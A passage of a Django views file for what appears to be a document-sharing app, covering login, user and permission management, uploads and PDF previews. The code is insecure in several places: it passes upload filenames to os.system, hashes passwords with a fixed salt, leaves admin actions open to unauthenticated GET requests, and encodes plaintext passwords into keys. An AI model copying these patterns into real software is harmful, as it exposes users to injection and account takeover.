pexpect.spawn(cmd)\n print (\"started %s\" % cmd)\n cpl = thread.compile_pattern_list([\n pexpect.EOF,\n \"frame= *\\d+\",\n '(.+)'\n ])\n while True:\n i = thread.expect_list(cpl, timeout=None)\n if i == 0: # EOF\n print\n \"the sub process exited\"\n break\n elif i == 1:\n frame_number = thread.match.group(0)\n print(frame_number)\n thread.close\n elif i == 2:\n # unknown_line = thread.match.group(0)\n # print unknown_line\n pass\n\ndef convert_word(input):\n end_length = len(input.split('.')[-1]) + 1\n name = input[0:-end_length]\n cmd = 'libreoffice --convert-to pdf %s' % input\n os.system(cmd)\n name = name.split('/')[-1] + '.pdf'\n return name\n\ndef login(request):\n if request.method ==\"POST\":\n try:\n username = json.loads(request.body)['username']\n password = json.loads(request.body)['password']\n if username: # 确保用户名和密码都不为空\n\n username = username.strip()\n # 用户名字符合法性验证\n # 密码长度验证\n # 更多的其它验证.....\n try:\n user = User.objects.get(username=username)\n id = user.id\n\n if user.password == hash_code(password):\n message = \"登陆成功!\"\n success = True\n Userinfo = User.objects.get(id=id)\n expires = Userinfo.authTime/1440\n if expires == 0:\n return JsonResponse({\"success\":False,\"data\":\"You don`t have permission\"}, safe=False)\n token = hashlib.sha1(os.urandom(24)).hexdigest()\n print(token)\n Token.objects.create(username_id=id,Token=token,createDate=timezone.now(),expires=expires)\n global globalUserId\n globalUserId = id\n Data = {\"isManager\": user.isManager, \"token\": token, \"expires\":expires, \"visit_time\":expires*60*60*24*1000}\n # response = HttpResponse('ok')\n # response.set_cookie(response,'ok','ok')\n # print(token)\n # return HttpResponse(json.dumps({\"msg\": \"ok!\"}))\n else:\n success = False\n Data = \"Wrong Password!\"\n return JsonResponse({\"success\": success, \"data\": Data})\n except Exception as e:\n success = False\n # Data = str(e)\n # token = '1'\n Data = \"Username is wrong!\"\n return JsonResponse({\"success\": success, \"data\": Data})\n # except:\n # success = False\n # Data = \"用户名不存在!\"\n except Exception as e:\n success = False\n Data = str(e)\n token = '2'\n return JsonResponse({\"success\": success, \"data\": Data})\n resp = JsonResponse({\"success\":success,\"data\":Data}, safe=False)\n resp.set_cookie('token', token)\n resp.set_cookie('isManager', user.isManager)\n resp.set_cookie('visit_time', expires*60*60*24)\n if user.isManager == False and user.authTime != 999999:\n User.objects.filter(id=id).update(authTime=0)\n return resp\n\n\ndef register(request):\n if request.method == \"POST\":\n Data = []\n try:\n username = json.loads(request.body)['username']\n password = json.loads(request.body)['password']\n email = json.loads(request.body)['email']\n same_name_user = User.objects.filter(username=username)\n if same_name_user: # 用户名唯一\n Data = '用户已经存在,请重新选择用户名!'\n success = False\n return JsonResponse({\"success\": success, \"data\": Data})\n return JsonResponse({\"success\": success, \"data\": Data})\n User.objects.create(username=username, password=hash_code(password), email=email, createDate=datetime.datetime.now())\n message = \"注册成功\"\n success = True\n return JsonResponse({\"success\": success, \"data\": Data})\n except Exception as e:\n success = False\n Data = str(e)\n return JsonResponse({\"success\": success, \"data\": Data})\n\ndef hash_code(s): # 加点盐\n h = hashlib.sha256()\n salt = 'mysite'\n c = salt+s\n h.update(c.encode()) # update方法只接收bytes类型\n return h.hexdigest()\n\ndef searchuser(request):\n if request.method == \"GET\":\n username = request.GET.get('username')\n users = User.objects.filter(username__icontains=username)\n jsonArry = []\n if users: #如果存在\n try:\n for user in users:\n name = user.username\n authtime = user.authtime\n jsonObj = {\"username\":name,\"authtime\":authtime}\n jsonArry.append(jsonObj)\n except:\n jsonArry.append({\"username\":name,\"authtime\":authtime})\n return JsonResponse(jsonArry, safe=False) #返回list的json\n\ndef change_info(request):\n if request.method == \"GET\":\n username = request.GET.get('username')\n password = request.GET.get('password')\n new_password = request.GET.get('New_password')\n message = \"所有字段都必须填写!\"\n if username and password: # 确保用户名和密码都不为空\n username = username.strip()\n # 用户名字符合法性验证\n # 密码长度验证\n # 更多的其它验证.....\n try:\n user = User.objects.get(username=username)\n if user.password == hash_code(password):\n User.objects.filter(username=username).update(password=hash_code(new_password))\n message = \"修改成功\"\n status = 1\n return JsonResponse({\"status\": status}) # 成功修改\n else:\n status = -1\n message = \"密码不正确!\"\n except:\n status = 0\n message = \"用户名不存在!\"\n return JsonResponse({\"status\": status})\n return JsonResponse({\"status\": status})\n\ndef deluser(request):\n if request.method == \"GET\":\n username = request.GET.get('username')\n # try:\n File_User.objects.filter(username_id=username).delete()\n User.objects.filter(username=username).delete()\n status = 1\n # except:\n status = 0\n return JsonResponse({\"status\": status})\n\n\n# def addkey(request):\n# if request.method == \"GET\":\n# key = request.GET.get('key')\n# authlevel = request.GET.get('authlevel')\n# authtime = request.GET.get('authtime')\n# files = request.GET.get('file') #每个文件访问时间,是一个二重Json文件,有fileaddress,time\n# new_key = Auth.objects.create()\n# new_key.key = key\n# new_key.authlevel = authlevel\n# new_key.authtime = authtime\n# new_file_user = File_User.objects.create()\n# for file in files:\n# new_file_user.key_id = key\n# new_file_user.filename_id = file.filename\n# new_file_user.time = file.time\n# new_key.save()\n# new_file_user.save()\n# return JsonResponse({\"status\":1})\n\n# def delectkey(request): #访问到时间了就删除\n# if request.method == \"GET\":\n# key = request.GET.get('key')\n# File_User.objects.filter(key = key).delete()\n# Auth.objects.filter(key=key).delete()\n# return JsonResponse({\"status\": 1})\ndef buildauth(request):#创建访问权限\n if request.method == \"GET\":\n # try:\n username = request.GET.get('username')\n filename = request.GET.get('filename')\n time = request.GET.get('time')\n File_User.objects.create(username_id=username, filename_id=filename, time=time)\n status = 1\n # except:\n # status = 0\n return JsonResponse({\"status\": status})\n\ndef delauth(request):#删除访问权限\n if request.method == \"GET\":\n username = request.GET.get('username')\n filename = request.GET.get('filename')\n File_User.objects.filter(username_id=username, filename_id=filename).delete()\n return JsonResponse({\"status\": 1})\n\ndef changeauth(request):#修改访问权限\n if request.method == \"GET\":\n username = request.GET.get('username')\n filename = request.GET.get('filename')\n time = request.GET.get('time')\n File_User.objects.filter(username_id=username, filename_id=filename).update(time=time)\n return JsonResponse({\"status\": 1})\n\ndef changeauthtime_user(request): #修改该用户访问权限\n if request.method == \"GET\":\n username = request.GET.get('username')\n authtime = request.GET.get('authtime')\n User.objects.filter(username=username).update(authtime=authtime)\n return JsonResponse({\"status\": 1})\n\ndef clearauth_user(request): #清空该用户权限\n if request.method == \"GET\":\n username = request.GET.get('username')\n try:\n authtime = 0\n File_User.objects.filter(username_id=username).delete()\n User.objects.filter(username=username).update(authtime=authtime)\n status = 1\n except:\n status = 0\n return JsonResponse({\"status\": status})\n\ndef searchauth_user(request): #查找该用户权限\n if request.method == \"GET\":\n username = request.GET.get('username')\n Auth_obj = File_User.objects.filter(username_id=username)\n AuthArray = []\n try:\n for auth in Auth_obj:\n filename = auth.filename_id\n time = auth.time\n authArray = {\"filename\":filename,\"time\": time}\n AuthArray.append(authArray)\n Result = {\"username\": username, \"auth\": AuthArray}\n except:\n Result = {\"username\": username, \"auth\": [{\"filename\":filename,\"time\": time}]}\n return JsonResponse(Result,safe=False)\n\ndef clearauth_file(request): #清空该文档权限\n if request.method == \"GET\":\n filename = request.GET.get('filename')\n try:\n File_User.objects.filter(filename_id=filename).delete()\n status = 1\n except:\n status = 0\n return JsonResponse({\"status\": status})\n\ndef searchauth_file(request): #查找该文件权限\n if request.method == \"GET\":\n filename = request.GET.get('filename')\n Auth_obj = File_User.objects.filter(filename_id=filename)\n AuthArray = []\n try:\n for auth in Auth_obj:\n username = auth.username_id\n time = auth.time\n authArray = {\"username\":username,\"time\": time}\n AuthArray.append(authArray)\n Result = {\"filename\":filename, \"auth\": AuthArray}\n except:\n Result = {\"filename\":filename, \"auth\": [{\"username\":username,\"time\": time}]}\n return JsonResponse(Result,safe=False)\n\n# def searchauth(request): #查找权限\n# if request.method == \"GET\":\n# keyname = request.GET.get('keyname')\n# keys = Auth.objects.filter(key__icontains=keyname)\n# jsonArry= []\n# for key in keys:\n# authlevel = key.authlevel\n# authtime = key.authtime\n# files = File_User.objects.filter(key = key) #Json形式\n# filejson = []\n# for file in files:\n# name = file.filename\n# time = file.time\n# filejson = {\"filename\": name, \"time\": time}\n# filejson.append(filejson)\n# objArry = {\"key\":key, \"authlevel\":authlevel, \"authtime\":authtime, \"file\": filejson}\n# jsonArry.append(objArry)\n# return JsonResponse(jsonArry) # 返回list的json\n\ndef addfile(request):\n if request.method == \"GET\":\n type = request.GET.get('type')\n file_obj = request.FILES.get('file')\n same_name = File.objects.filter(filename=file_obj.name)\n address = '/file/'\n if same_name: # 用户名唯一\n return JsonResponse({\"message\":\"文件名重复\"})\n FileDB = File.objects.create()\n FileDB.filename = file_obj.name\n FileDB.type = type\n FileDB.save()\n fileaddress = address+file_obj.name\n with open(fileaddress,'wb')as f:\n for ffile in file_obj.chunks():\n f.write(ffile)\n return JsonResponse({\"status\": 1})\n\ndef delectfile(request):\n if request.method == \"GET\":\n filename = request.GET.get('filename')\n file = File.objects.filter(filename=filename)\n if file:\n print(file['src'])\n os.remove(file.src)\n File.objects.filter(filename=filename).delete()\n return JsonResponse({\"status\": 1})\n\ndef searchfile(request):\n if request.method == \"GET\":\n filename = request.GET.get('filename')\n files = File.objects.get(filename__icontains=filename)\n jsonArry = []\n try:\n for file in files:\n name = file.filename\n type = file.type\n except:\n name = files.filename\n type = files.type\n jsonObj = {\"filename\":name,\"type\":type}\n jsonArry.append(jsonObj)\n return JsonResponse(jsonArry,safe=False) #返回list的json\n\ndef grouplogin(request):\n if request.method == \"GET\":\n key = request.GET.get('key')\n try:\n code = base64.b32decode(key)\n username = code.split(':')[0]\n password = code.split(':')[1]\n if username and password: # 确保用户名和密码都不为空\n\n username = username.strip()\n # 用户名字符合法性验证\n # 密码长度验证\n # 更多的其它验证.....\n try:\n user = User.objects.get(username=username)\n if user.password == hash_code(password):\n message = \"登陆成功!\"\n return JsonResponse({\"status\": 1}) #成功登陆\n # return HttpResponse(json.dumps({\"msg\": \"ok!\"}))\n else:\n message = \"密码不正确!\"\n except:\n message = \"用户名不存在!\"\n return JsonResponse({\"status\": 0})\n return JsonResponse({\"status\": 0})\n except:\n return JsonResponse({\"status\": 0})\n\ndef buildgroup(request):\n if request.method == \"GET\":\n username = request.GET.get('username')\n password = request.GET.get('password')\n same_name_user = User.objects.filter(username=username)\n key = \"\"\n if same_name_user: # 用户名唯一\n message = '用户已经存在,请重新选择用户名!'\n return JsonResponse({\"status\": 0, \"key\":key})\n new_user = User.objects.create()\n new_user.username = username\n new_user.password = hash_code(password)\n new_user.authtime = 0 # 注册新用户 默认无权限\n new_user.save()\n message = \"注册成功\"\n code = username+':'+password\n key = base64.b32encode(code)\n return JsonResponse({\"status\": 1, \"key\":key}) # 自动跳转到登录页面,返回可访问时间、访问等级\n\ndef getUserList(request):\n if request.method == \"GET\":\n Users = User.objects.all()\n Data = []\n try:\n success = True\n if Users: # 数据库有数据\n if isinstance(Users, Iterable) == True:\n for user in Users:\n id = user.id\n username = user.username\n createDate = user.createDate\n authTime = user.authTime #API新增\n userinfo = {\"id\":str(id), \"username\":username, \"createDate\":createDate, \"limit\":authTime}#API新增\n Data.append(userinfo)\n else:\n id = Users.id\n username = Users.username\n createDate = Users.createDate\n authTime = Users.authTime # API新增\n Data = {\"id\": str(id), \"username\": username, \"createDate\": createDate, \"authTime\": authTime} # API新增\n else:\n pass\n except Exception as e:\n # success = False #测试\n success = True\n Data = str(e)\n return JsonResponse({\"success\": success, \"data\": Data})\n\ndef getFileList(request):\n if request.method == \"GET\":\n try:\n success = True\n token = request.COOKIES[\"token\"]\n tokenInfo = Token.objects.get(Token=token)\n userid = tokenInfo.username_id\n Userinfo = User.objects.get(id=userid)\n creator = Userinfo.username\n isManager = Userinfo.isManager\n Data = []\n if(isManager==False):\n Fileinfo = File_User.objects.filter(username_id=userid, auth=1).order_by('-filename_id')\n if Fileinfo:\n for a in Fileinfo:\n id = a.filename_id\n file = File.objects.get(id=id)\n id = file.id\n filename = file.filename\n content = file.content\n type = file.type\n createDate = file.createDate\n if (filename[0:6] == \"_fake_\"):\n info = {\"id\": filename, \"title\": filename, \"content\": content, \"type\": type,\n \"createDate\": createDate, \"group\": charIntoarray(file.group),\"creator\":creator}\n else:\n info = {\"id\": str(id), \"title\": filename, \"content\": content, \"type\": type,\n \"createDate\": createDate, \"group\": charIntoarray(file.group),\"creator\":creator}\n # info = {\"id\":id, \"title\":filename, \"content\":content,\"type\":type,\"createDate\":createDate,\"group\":[]}\n Data.append(info)\n else:\n Files = File.objects.all().order_by('-id')\n try:\n if Files: # 数据po库有数据\n if isinstance(Files, Iterable) == True:\n for file in Files:\n id = file.id\n filename = file.filename\n content = file.content\n type = file.type\n createDate = file.createDate\n if (filename[0:6]==\"_fake_\"):\n info = {\"id\": filename, \"title\": filename, \"content\": content, \"type\": type,\"createDate\": createDate,\"group\":charIntoarray(file.group),\"creator\":\"wedon\"}\n else:\n info = {\"id\": str(id), \"title\": filename, \"content\": content, \"type\": type, \"createDate\": createDate,\"group\":charIntoarray(file.group),\"creator\":\"wedon\"}\n # info = {\"id\":id, \"title\":filename, \"content\":content,\"type\":type,\"createDate\":createDate,\"group\":[]}\n Data.append(info)\n else:\n id = Files.id\n filename = Files.filename\n content = Files.content\n type = Files.type\n createDate = Files.createDate\n Data = {\"id\": str(id), \"title\": filename, \"content\": content, \"type\": type, \"createDate\": createDate,\"group\":charIntoarray(Files.group),\"creator\":\"wedon\"}\n # Data = {\"id\": \"_fake_asdsa\", \"title\": filename, \"content\": content, \"type\": type,\"createDate\":createDate,\"group\":[111]}\n else:\n pass\n except Exception as e:\n # success = False\n success = True\n Data = str(e)\n except Exception as e:\n # success = False\n success = True\n Data = str(e)\n # response_data = {}\n # response_data['success'] = success\n # response_data['data'] = Data\n # response_data['userid'] = globalUserId\n # return HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n # Data = {\"id\": \"_fake_\", \"title\": \"\", \"content\": \"\", \"type\": \"\", \"createDate\": \"\",\n # \"group\": [\"111\"]}\n return JsonResponse({\"success\": success, \"data\": Data,\"userid\":globalUserId},safe=False)\ndef postFile(request):\n if request.method ==\"POST\":\n Data = []\n try:\n success = True\n id = json.loads(request.body)['id']\n # id = request.POST.get('id')\n try:\n type = json.loads(request.body)['file']\n except:\n type = json.loads(request.body)['type']\n title = json.loads(request.body)['title']\n content = json.loads(request.body)['content']\n authUserList = json.loads(request.body)['authUserList']#API需要新增time\n print(authUserList)\n if id == \"-1\":\n File.objects.create(type=type,filename=title, content=content,createDate=datetime.datetime.now())\n lastFile = File.objects.order_by('createDate')[0:1].get()\n filename_id = lastFile.id#如果重复上传 会出BUG\n print(filename_id)\n if isinstance(authUserList,Iterable)==True:\n for authlist in authUserList:\n File_User.objects.create(filename_id=filename_id,username_id=authlist['id'], time=authlist['limit'], timeLimit=authlist['timeLimit'])\n Data = {\"title\": title, \"id\": str(filename_id)}\n else:\n File_User.objects.create(filename_id=filename_id, username_id=authUserList['id'],time=authUserList['limit'], timeLimit=authUserList['timeLimit'])\n Data = {\"title\": title, \"id\": str(filename_id)}\n else:\n if type:\n File.objects.filter(id=id).update(type=type, filename=title, content=content,createDate=datetime.datetime.now())\n else:\n File.objects.filter(id=id).update(filename=title, content=content,createDate=datetime.datetime.now())\n File_User.objects.filter(filename_id=id).delete()\n if isinstance(authUserList, Iterable) == True:\n for authlist in authUserList:\n File_User.objects.create(filename_id=id, username_id=authlist['id'], time=authlist['limit'], timeLimit=authlist['timeLimit'])\n print(1)\n Data = {\"title\": title, \"id\":str(id)}\n else:\n File_User.objects.create(filename_id=id, username_id=authUserList['id'], time=authUserList['limit'], timeLimit=authUserList['timeLimit'])\n Data = {\"title\": title, \"id\": str(id)}\n except Exception as e:\n success = False\n Data = str(e)\n return JsonResponse({\"success\": success, \"data\": Data})\n\ndef uploadFile(request):\n if request.method ==\"POST\":\n Data = []\n try:\n success = True\n id = request.POST.get('id')\n print(id)\n title = request.POST.get('title','')\n content = request.POST.get('content','')\n type = request.POST.get('type','')\n file_obj = request.FILES['file']\n group = request.POST.get('group')\n name = os.path.splitext(file_obj.name)[0]\n address = os.path.splitext(file_obj.name)[-1]\n src = hash_code(name)+address #到时候修改成服务器的地址\n print(\"FIletype:\"+address)\n print(src)\n if id == \"-1\":\n # if address == '.pdf' or address == '.PDF': #切片操作\n # with open(src, 'wb')as f:\n # for ffile in file_obj.chunks():\n # f.write(ffile)\n # inputpdf = PdfFileReader(open(src, \"rb\"))\n # output = PdfFileWriter()\n # print(\"1\")\n # for i in range(inputpdf.numPages):\n # output.addPage(inputpdf.getPage(i))\n # # output.encrypt(user_pwd=\"wyd\",owner_pwd=\"None\",use_128bit=True,allow_printing=False, allow_commenting=False,overwrite_permission=False)\n # pagesrc = src+\"-page%s.pdf\" % (i+1)\n # print(pagesrc)\n # with open(pagesrc, \"wb\") as outputStream: #页码\n # output.write(outputStream)\n # File.objects.create(filename=title, type=type, content=content, createDate=datetime.datetime.now(),src=filesrc + src,group=group)\n #\n with open(src, 'wb')as f:\n for ffile in file_obj.chunks():\n f.write(ffile)\n if address == '.avi' or address =='.AVI'or address =='.asf'or address =='.ASF' or address =='.wav'or address =='.WAV' or address =='.flv'or address =='.FLV' or address =='.siff'or address =='.SIFF':\n print(\"filetype: video\")\n convert_video(src,hash_code(name)+'.mp4')\n # time.sleep(5)\n os.remove(src)\n newsrc = hash_code(name)+'.mp4'\n File.objects.create(filename=title, type=type, content=content,createDate=datetime.datetime.now(), src=filesrc+newsrc,group=group)#我认为下面还要返回id\n elif address == '.docx' or address =='.doc':\n newsrc = convert_word(src)\n os.remove(src)\n File.objects.create(filename=title, type=type, content=content, createDate=datetime.datetime.now(),\n src=filesrc + newsrc, group=group)\n else:#不准确\n File.objects.create(filename=title, type=type, content=content, createDate=datetime.datetime.now(),src=filesrc+ src,group=group)\n\n lastFile = File.objects.order_by(\"-createDate\")[0:1].get()\n id = lastFile.id\n print(id)\n Data = {\"title\": title, \"id\": str(id), \"type\":type}\n else:\n # if address == '.pdf': #切片操作\n # inputpdf = PdfFileReader(open(src, \"wb\"))\n # for i in range(inputpdf.numPages):\n # output = PdfFileWriter()\n # output.addPage(inputpdf.getPage(i))\n # with open(src+\"-page%s.pdf\" % i, \"wb\") as outputStream: #页码\n # output.write(outputStream)\n # File.objects.filter(id=id).update(filename=title, type=type, content=content,createDate=datetime.datetime.now(),src=filesrc+src,group=group)\n # else:\n with open(src, 'wb')as f:\n for ffile in file_obj.chunks():\n f.write(ffile)\n if address == '.avi' or address =='.AVI'or address =='.asf'or address =='.ASF' or address =='.wav'or address =='.WAV' or address =='.flv'or address =='.FLV' or address =='.siff'or address =='.SIFF':\n convert_video(src,hash_code(name)+'.mp4')\n # time.sleep(5)\n os.remove(src)\n newsrc = hash_code(name)+'.mp4'\n File.objects.create(filename=title, type=type, content=content,createDate=datetime.datetime.now(), src=filesrc+newsrc,group=group)#我认为下面还要返回id\n if address == '.jpg' or address == '.JPG' or address == '.png' or address == '.PNG' or address == '.gif' or address == '.GIF':#不准确\n print(\"filetype:img\")\n File.objects.create(filename=title, type=type, content=content, createDate=datetime.datetime.now(),src=filesrc + src,group=group)\n else:\n print(\"error\")\n success = False\n Data = {\"title\": title, \"id\": str(id), \"type\": type}\n except Exception as e:\n success = False\n Data = str(e)\n return JsonResponse({\"success\": success, \"data\": Data})\n\ndef postUser(request):\n if request.method ==\"POST\":\n Data = []\n try:\n success = True\n id = json.loads(request.body)['id']\n username = json.loads(request.body)['username']\n email = json.loads(request.body)['email']\n try:\n password = json.loads(request.body)['password']\n except:\n pass\n limit = json.loads(request.body)['limit']#API请求参数新增 authtime\n if limit is None:\n limit = 999999\n print(limit)\n authFileList = json.loads(request.body)['authFileList']#API请求参数新增 time\n print(authFileList)\n if id == -1:\n User.objects.create(username=username, email=email, password=hash_code(password),createDate=datetime.datetime.now(),authTime=limit)\n username_id = User.objects.all()[0].id\n if isinstance(authFileList, Iterable) == True:\n for authlist in authFileList:\n if authlist['id'][0:6]==\"_fake_\":\n fakeid = File.objects.get(filename=authlist['id']).id\n File_User.objects.create(auth=1,username_id=username_id, filename_id=fakeid,time=authlist['limit'],timeLimit=authlist['timeLimit'])\n else:\n File_User.objects.create(auth=1,username_id=username_id,filename_id=authlist['id'], time=authlist['limit'],timeLimit=authlist['timeLimit'])\n else:\n File_User.objects.create(auth=1,username_id=username_id, filename_id=authFileList['id'],time=authFileList['limit'],timeLimit=authFileList['timeLimit'])\n # fakeFileInfo = FIle.objects.filter(filename__contains='fake')\n # for fakeinfo in fakeFileInfo:\n # File_User.objects.create(username_id=username_id,filename_id=fakeinfo[id]) #创建文件夹权限表\n else:\n if password:\n User.objects.filter(id=id).update(username=username, email=email, password=hash_code(password),createDate=datetime.datetime.now(),authTime=limit)\n else:\n User.objects.filter(id=id).update(username=username, email=email,createDate=datetime.datetime.now(),authTime=limit)\n # ,authtime=authtime\n\n for authFile in authFileList:\n if authFile['id'][0:6] == \"_fake_\":\n filename_id = File.objects.get(filename=authFile['id']).id\n File_User.objects.filter(username_id=id, filename_id=filename_id).delete()\n # fakeid = File.objects.get(filename=authlist['id']).id\n # File_User.objects.create(username_id=username_id, filename_id=fakeid, time=authlist['limit'])\n fakefileinfo = File.objects.filter(filename__contains='fake')\n fakeinfolist=[]\n for fakefile in fakefileinfo:\n fakefileid=fakefile.id\n fakeinfolist.append(fakefileid)\n File_User.objects.filter(username_id=id).exclude(filename_id__in=fakeinfolist).delete()\n if isinstance(authFileList, Iterable) == True:\n for authlist in authFileList:\n if (authlist['id'][0:6]==\"_fake_\"):\n filename_id = File.objects.get(filename=authlist['id']).id\n print(filename_id)\n File_User.objects.create(auth=1,username_id=id, filename_id=filename_id, time=authlist['limit'],timeLimit=authlist['timeLimit'])\n else:\n File_User.objects.create(auth=1,username_id=id, filename_id=authlist['id'], time=authlist['limit'],timeLimit=authlist['timeLimit'])\n else:\n File_User.objects.create(auth=1,username_id=id, filename_id=authFileList['id'], time=authFileList['limit'],timeLimit=authFileList['timeLimit'])\n except Exception as e:\n success = False\n Data = str(e)\n #把auth权限还原成1\n return JsonResponse({\"success\": success, \"data\": Data})\n\ndef getUser(request):\n if request.method ==\"POST\":\n try:\n success = True\n id = json.loads(request.body)['userId']\n userInfo = User.objects.get(id=id)\n username = userInfo.username\n email = userInfo.email\n createDate = userInfo.createDate\n authFileList = []\n FileList = File_User.objects.filter(username_id=id)\n\n print(1)\n if isinstance(FileList, Iterable) == True:\n for authlist in FileList:\n filename_id = authlist.filename_id\n time = authlist.time\n timeLimit = authlist.timeLimit\n fakename = File.objects.get(id=filename_id).filename\n if fakename[0:6]==\"_fake_\":\n if time is not None:\n if timeLimit is not None:\n jsonArray = {\"id\": fakename, \"limit\": float(time),\"timeLimit\":int(timeLimit)}\n else:\n jsonArray = {\"id\": fakename, \"limit\": float(time), \"timeLimit\": timeLimit}\n else:\n if timeLimit is not None:\n jsonArray = {\"id\": fakename, \"limit\": time,\"timeLimit\":int(timeLimit)}\n else:\n jsonArray = {\"id\": fakename, \"limit\": time, \"timeLimit\": timeLimit}\n else:\n jsonArray = {\"id\": str(filename_id), \"limit\": float(time),\"timeLimit\":int(timeLimit)}\n authFileList.append(jsonArray)\n print(3)\n Data = {\"username\": username, \"email\": email, \"createDate\": createDate,\n \"limit\": userInfo.authTime, \"authFileList\": authFileList}\n else:\n filename_id = FileList.filename_id\n time = FileList.time\n timeLimit = FileList.timeLimit\n fakename = File.objects.get(id=filename_id).filename\n if fakename[0:6] == \"_fake_\":\n jsonArray = {\"id\": fakename, \"limit\": float(time),\"timeLimit\":int(timeLimit)}\n else:\n jsonArray = {\"id\": str(filename_id), \"limit\": float(time),\"timeLimit\":int(timeLimit)}\n authFileList.append(jsonArray)\n Data = {\"username\":username,\"email\":email,\"createDate\":createDate,\"limit\":userInfo.authTime,\"authFileList\":authFileList}\n print(4)\n print(5)\n return JsonResponse({\"success\": success, \"data\": Data})\n # except:\n # Data = {\"username\": username, \"email\": email, \"createDate\": createDate, \"limit\": userInfo.authTime,\"authFileList\": authFileList}\n # print(2)\n # return JsonResponse({\"success\": success, \"data\": Data})\n except Exception as e:\n success = False\n Data = str(e)\n return JsonResponse({\"success\": success, \"data\": Data})\n\ndef getFile(request):\n if request.method ==\"POST\":\n try:\n success = True\n id = int(json.loads(request.body)['fileId'])\n fileInfo = File.objects.get(id=id)\n title = fileInfo.filename\n content = fileInfo.content\n createDate = fileInfo.createDate\n type = fileInfo.type\n src = fileInfo.src\n print(type)\n authUserList = []\n token = request.COOKIES[\"token\"]\n # print(token)\n tokenInfo = Token.objects.get(Token=token)\n userid = tokenInfo.username_id\n\n if (User.objects.get(id=userid).isManager == False):\n #判断有无权限\n timeLimitdd = File_User.objects.get(username_id=userid, filename_id=id).timeLimit\n try:\n FileList = File_User.objects.get(username_id=userid, filename_id=id)\n except:\n return JsonResponse({\"success\": False, \"data\": \"You can`t open this file\"})\n #判断父文件夹有无全新啊\n File_User.objects.filter(username_id=userid, filename_id=id).update(auth=0)\n thisUserFile = File.objects.get(id=id) #取出文件\n thisGroup = thisUserFile.group\n try:\n thisFakeFile = File.objects.get(filename__contains='fake', group=thisGroup)\n fakeid = thisFakeFile.id\n limit = File_User.objects.get(filename_id=fakeid, username_id=userid).time\n timeLimit = File_User.objects.get(filename_id=fakeid, username_id=userid).timeLimit\n except:\n limit = File_User.objects.get(filename_id=id,username_id=userid).time\n timeLimit = File_User.objects.get(filename_id=id, username_id=userid).timeLimit\n if limit is None and timeLimit is None:\n limit = File_User.objects.get(filename_id=id, username_id=userid).time\n timeLimit = File_User.objects.get(filename_id=id, username_id=userid).timeLimit\n if type == \"pdf\" or type == \"PDF\" or type == \"DOCX\" or type == \"docx\" or type == \"DOC\" or type == \"doc\":\n list = src.split(\"/\")\n totalPage = PdfFileReader(open(list[3], \"rb\")).numPages\n timepage = int(math.ceil(float(limit)*totalPage))\n inputpdf = PdfFileReader(open(list[3], \"rb\"))\n output = PdfFileWriter()\n for i in range(timepage):\n output.addPage(inputpdf.getPage(i))\n pagesrc = src+\"-page%s.pdf\" % (timepage)\n print(pagesrc)\n list = pagesrc.split(\"/\")\n with open(list[3], \"wb\") as outputStream: #页码\n output.write(outputStream)\n print(\"生成成功\")\n src = pagesrc\n try:\n # if type==\"pdf\":\n # Fileinfo = File_User.objects.filter(filename_id=id)\n # if isinstance(Fileinfo, Iterable) == True:\n # for authlist in Fileinfo:\n # username_id = authlist.username_id\n # time = authlist.time\n # timepage = math.ceil(time) # 向上取证\n # page = '-page' + str(int(timepage))+'.pdf'\n # jsonArray = {\"id\": str(username_id), \"limit\": float(time)}\n # authUserList.append(jsonArray)\n # src = src + page\n # print(src)\n # else:\n # print(2)\n # username_id = Fileinfo.username_id\n # time = Fileinfo.time\n # authUserList = [{\"id\": str(username_id), \"limit\": float(time)}]\n\n Fileinfo = File_User.objects.filter(filename_id=id)\n if isinstance(Fileinfo, Iterable) == True:\n for authlist in Fileinfo:\n username_id = authlist.username_id\n time = authlist.time\n timeLimit = authlist.timeLimit\n jsonArray = {\"id\":str(username_id), \"limit\":float(time),\"timeLimit\":int(timeLimit)}\n authUserList.append(jsonArray)\n print(1)\n else:\n print(2)\n username_id = Fileinfo.username_id\n time = Fileinfo.time\n timeLimit = FileList.timeLimit\n authUserList = [{\"id\": str(username_id), \"limit\":float(time),\"timeLimit\":int(timeLimit)}]\n Data = {\"id\":str(id),\"title\":title,\"content\":content,\"src\":src,\"createDate\":createDate,\"type\":type,\"authUserList\":authUserList,\"limit\":float(limit),\"timeLimit\":int(timeLimitdd)}\n print(\"普通账户\")\n print(limit)\n except Exception as e:\n # print(3)\n # success = False\n # Data = str(e)\n print(\"error\")\n time = FileList.time\n Data = {\"id\": str(id), \"title\": title, \"content\": content, \"src\": src, \"createDate\": createDate,\"type\":type,\n \"authUserList\": authUserList,\"limit\":math.ceil(float(limit)),\"timeLimit\":int(timeLimitdd)}\n if (User.objects.get(id=userid).isManager == True):\n limit = 1\n Fileinfo = File_User.objects.filter(filename_id=id)\n if isinstance(Fileinfo, Iterable) == True:\n for authlist in Fileinfo:\n username_id = authlist.username_id\n time = authlist.time\n timeLimit = authlist.timeLimit\n jsonArray = {\"id\":str(username_id), \"limit\":float(time),\"timeLimit\":timeLimit}\n authUserList.append(jsonArray)\n print(1)\n else:\n print(2)\n username_id = Fileinfo.username_id\n time = Fileinfo.time\n timeLimit = Fileinfo.timeLimit\n authUserList = [{\"id\": str(username_id), \"limit\": float(time),\"timeLimit\":timeLimit}]\n Data = {\"id\": str(id), \"title\": title, \"content\": content, \"src\": src, \"createDate\": createDate,\n \"type\": type, \"authUserList\": authUserList, \"limit\": math.ceil(float(limit)),\"timeLimit\":999999}\n print(\"管理员账户\")\n print(limit)\n except Exception as e:\n success = False\n Data = str(e)\n return JsonResponse({\"success\": success, \"data\": Data})\n\ndef deleteUser(request):\n if request.method ==\"POST\":\n Data = []\n try:\n success = True\n id = json.loads(request.body)['id']\n User.objects.filter(id = id).delete()\n except Exception as e:\n success = False\n Data = str(e)\n return JsonResponse({\"success\": success, \"data\": Data})\n\ndef deleteFile(request):\n if request.method ==\"POST\":\n Data=[]\n try:\n success = True\n id = json.loads(request.body)['id']\n file = File.objects.get(id=id)\n list = file.src.split(\"/\")\n File.objects.filter(id=id).delete()\n if file.type == \"pdf\":\n filenames = glob.glob(list[3]+'*')\n for filename in filenames: os.remove(filename)\n else:\n os.remove(list[3])\n except Exception as e:\n success = False\n Data = str(e)\n return JsonResponse({\"success\": success, \"data\": Data})\n\n\ndef logout(request):\n if request.method ==\"GET\":\n Data=[]\n try:\n success = True\n\n resp = JsonResponse({\"success\": success, \"data\": Data}, safe=False)\n resp.delete_cookie('token')\n resp.delete_cookie('isManager')\n return resp\n except Exception as 